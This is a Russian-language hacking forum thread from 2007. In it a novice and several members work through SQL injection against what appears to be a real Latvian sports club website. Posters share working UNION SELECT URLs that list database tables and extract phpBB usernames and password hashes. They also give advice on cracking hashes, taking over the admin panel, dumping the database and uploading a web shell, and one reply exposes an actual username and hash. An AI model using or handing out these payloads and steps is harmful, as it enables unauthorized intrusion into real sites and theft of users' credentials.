Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.12.2007, 19:30
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641
Репутация:
8
|
|
Помогите залить шелл
Доброе время суток. Значит так , дело было вечером и делать естественно было нечего.
И после просмотра очередного видео о SQL inj и заливе шела я решил попробывать это сам.
Первое что я сделал нашол жертву своих коварных замыслов:
После того как жертва была найдена я проверил саит на наличие скуля:
http://www.site.lv/?p=news&off=&id=10`4
Ура скуль найден.
Далие нахожу количество полей...
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,3,4,5,6/*
Потом смотрю название и версию БД....
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,version(),4,5,6/*
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,database(),4,5,6/*
Получил версию : 5.0.21-community-nt
и название ДБ : xxx
Теперь было бы неплохо найти узеров + их пароли к адм панели саита...
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,user,4,5,6+from+users/*
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,pass,4,5,6+from+users/*
И тут опять же удача мне улыбнулась и после этих 2 запросов я получил 3 узернаме и пароли к ним.
Зайдя в адм панель ничего интересного я там ненашол кроме ДОБАВИТЙ ИЗМЕНИТЙ УДАЛИТЙ новости.... это меня огарчило и на некоторе время загнало в тупик , так как незнал што делатй дальше..
Немного подумав решил наити таблици в ДБ и составил такои запрос:
http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,table_name,4,5,6+from+inform ation_schema.tables/*
После этого запроса получил название всех таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
countries
countries_
matches
matches2005
matches2006
matches2007
news
players
players_
positions
teams
teams_
users
visit
И на этом я остановился ,так как незнаю что необходимо сделать дальше для того что би залить шелл...
Может ктонибудь мог бы мне немного подсказать ....
P.S Hе судите меня строго , я весго лиш новичок...
Последний раз редактировалось br1tva; 26.12.2007 в 19:56..
|
|
|
26.12.2007, 19:33
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Попробуй к фтп подконнектиться =)
ftp://user  assword@site.lv
Последний раз редактировалось AFoST; 26.12.2007 в 19:35..
Причина: дополнил
|
|
|
|
26.12.2007, 19:33
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...
|
|
|
|
26.12.2007, 19:33
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Выводи логин и пасс админа из phpbb_users, расшифровывай хеш, заливай шелл.  |
|
|
|
26.12.2007, 19:34
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641
Репутация:
8
|
|
Сообщение от 159932
ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...
А можно немного поподробней... ? Какой нужен запрос ???
|
|
|
|
26.12.2007, 19:39
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_pas sword),4,5,6+from+phpbb_users/*
|
|
|
|
26.12.2007, 19:43
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,concat_ws(0x3a,username,user_password,user_email,user_icq),4,5,6+from+fkvbb.phpbb_users/*
=\
Последний раз редактировалось Nea7; 26.12.2007 в 19:59..
Причина: палево
|
|
|
|
26.12.2007, 19:47
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Nea7, палево :-D
|
|
|
|
26.12.2007, 22:25
|
|
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641
Репутация:
8
|
|
Сообщение от 159932
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_pas sword),4,5,6+from+phpbb_users/*
Сделав такой запрос получил такой erorr:
Table 'fkventspils.phpbb_users' doesn't exist
А почему fkventspils.phpbb_users если в моём запросе phpbb_users?
Форум находится http://www.site.lv/forum/
Может это как то влияет ?
|
|
|
|
27.12.2007, 01:53
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
А почему fkventspils.phpbb_users если в моём запросе phpbb_users?
Автоматически подставляется текущая бд, а именно fkventspils. А бд форума называется по другому.
Код:
http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,table_schema,4,5,6+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+0,1/*
Вот и узнали, что данные форума лежат у нас в fkvbb.
Составляем запрос:
Код:
http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6+from+fkvbb.phpbb_users+limit+1,1/*
Andruxa: 7fee56ff9519fdc6c473dee675c4b003
и т.д. лимитом. (;
Последний раз редактировалось delay(0); 27.12.2007 в 01:57..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
